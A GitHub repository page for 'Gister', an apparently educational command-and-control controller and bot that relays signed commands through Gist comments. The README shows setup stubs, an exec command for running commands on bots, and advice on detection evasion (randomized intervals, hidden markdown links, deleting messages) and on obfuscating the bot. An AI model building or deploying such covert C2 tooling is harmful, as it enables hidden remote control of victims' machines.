Skip to content
/ Gister Public

C&C CLI controller and bot that use gist.github.com for communication.

License

GPL-3.0 license
0 stars 2 forks Branches Tags Activity
Star
Notifications You must be signed in to change notification settings

M0dEx/Gister

BranchesTags

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

29 Commits
.gitignore
.gitignore
 
 
LICENSE
LICENSE
 
 
README.md
README.md
 
 
bot.py
bot.py
 
 
channel.py
channel.py
 
 
controller.py
controller.py
 
 
requirements.txt
requirements.txt
 
 

Repository files navigation

Gister

Description

C&C CLI controller and bot that use gist.github.com for communication. The bot uses comments under a given Gist to communicate with the controller.
To evade detection, all intervals for pinging and checking new messages are randomized and some steganography is used (links in markdown are not shown if the alternate text field is empty).
If a message was "consumed" (read and responded to), it is immediately removed from the Gist comment thread.

Usage

Controller

For running the controller, you have to create another python script which initalizes the class Controller with the specified parameters.

from controller import Controller


def main():
    controller = Controller(
        "ghp_xxxxxxxxxxxxxxxxxxxxxxxxxx",                   # GitHub Personal Access Token
        "xxxxxxxxxxxxxxxxxxxxxxxxxxxxxx",                   # Gist ID of the Gist to be used for communication
        "xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx="      # 32-byte seed in Base64 (`openssl rand -base64 32`) used to generate the private key used for signing commands
    )


if __name__ == "__main__":
    main()

Right after start up, you get a VerifyKey used by the bots to verify the signed commands messages.

Verify key: xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx=
(*)$

The interactive shell supports a couple of commands, which are described in the help menu.

(*)$ help

Gister Bot C&C CLI
==================
List of available commands:
status			=> Prints the number of available bots
list			=> Lists available (alive) bots
bot <bot id>	        => Selects a bot to execute commands on
exec <command>	        => Executes a command on a selected bot
exit			=> Cleans up the communication channel and exits

Bot

For running the bot, you have to create yet another python script that initalizes the class Bot with the specified parameters.
The VerifyKey used is generated by the controller on startup.

DO NOT USE THE 32-BYTE SECRET USED BY THE CONTROLLER IN THE BOT'S CONFIGURATION. IT WILL NOT RESPOND TO MESSAGES SINCE THE SIGNATURES WON'T BE VALID AND YOU WILL COMPRIMISE THE CONFIDENTIALITY OF YOUR PRIVATE KEY.

from bot import Bot


def main():
    bot = Bot(
        "ghp_xxxxxxxxxxxxxxxxxxxxxxxxxx",                   # GitHub Personal Access Token
        "xxxxxxxxxxxxxxxxxxxxxxxxxxxxxx",                   # Gist ID of the Gist to be used for communication
        "xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx="      # The VerifyKey generated by the controller
    )


if __name__ == "__main__":
    main()

Execution

You can create stand-alone self-contained executables from the scripts given in Usage using PyInstaller. You can also create python scripts, which contain the relevant classes, obfuscate them and use those.

Disclaimer

This project was made for educational purposes only as a part of the B4M36BSY course on the Faculty of Electrical Engineering, Czech Technical University in Prague.

About

C&C CLI controller and bot that use gist.github.com for communication.

Topics

bot gist python3 botnet-source

Resources

Readme

License

GPL-3.0 license
Activity

Stars

0 stars

Watchers

1 watching

Forks

2 forks
Report repository

Releases

No releases published

Packages

No packages published

Languages